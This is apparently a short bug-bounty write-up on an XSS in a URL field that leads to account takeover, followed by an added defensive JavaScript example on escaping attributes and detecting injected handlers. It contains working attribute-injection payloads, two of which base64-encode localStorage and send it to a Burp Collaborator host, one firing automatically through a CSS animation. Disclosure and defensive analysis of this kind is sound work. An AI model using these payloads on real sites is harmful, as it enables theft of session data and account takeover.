How I managed to trigger XSS automatically to get critical account takeover

https://google.com"'/>
Broken HTML
https://google.com"onclick="alert('1')"a="
<a href="https://google.com" onclick="alert(1)" a=""> 
https://google.com"onclick="b=JSON.stringify(localStorage);c=btoa(b);i=new/**/Image;i.src='https://burpcollaborator.burpcollaborator.net?t='+c"a="
REDACTED CSS
https://google.com"onanimationstart="b=JSON.stringify(localStorage);c=btoa(b);i=new/**/Image;i.src='https://burpcollaborator.burpcollaborator.net?t='+c"style="animation-name:Toastify__bounceOutRight
  • I put the malicious JavaScript code in the onanimationstart attribute.
  • I defined the animation I found in the tag’s style.
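The strings above work because the submitted URL is written into href="..." without escaping the double quote, so everything after it becomes new attributes on the tag. The following is an added example, not code from the post or from the affected application: it contrasts that rendering pattern with a hardened one. The function names and sample strings are assumptions, with alert(1) standing in for the script.

```javascript
// Added defensive example; function names are hypothetical, samples are constructed.

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Vulnerable pattern: the value is concatenated into href="..." as-is, so a
// double quote ends the attribute and the remainder is parsed as new attributes.
function renderLinkUnsafe(url) {
  return '<a href="' + url + '">link</a>';
}

// Hardened: accept only absolute http(s) URLs and escape the serialized value.
function renderLinkSafe(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch (e) {
    return null; // not a parseable absolute URL
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
    return null; // rejects javascript:, data: and other schemes
  }
  return '<a href="' + escapeAttr(parsed.href) + '" rel="noopener noreferrer">link</a>';
}

// True when the markup contains an event-handler attribute opened after a quote.
function hasInjectedHandler(html) {
  return /"\s*on[a-z]+\s*=\s*"/i.test(html);
}

// Constructed inputs shaped like the strings in the post; alert(1) is a stand-in.
const samples = [
  "https://google.com",
  "https://google.com\"onclick=\"alert('1')\"a=\"",
  "https://google.com\"onanimationstart=\"alert(1)\"style=\"animation-name:Toastify__bounceOutRight",
];

for (const s of samples) {
  console.log(hasInjectedHandler(renderLinkUnsafe(s)), renderLinkSafe(s));
}
```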

c4rrilat0r
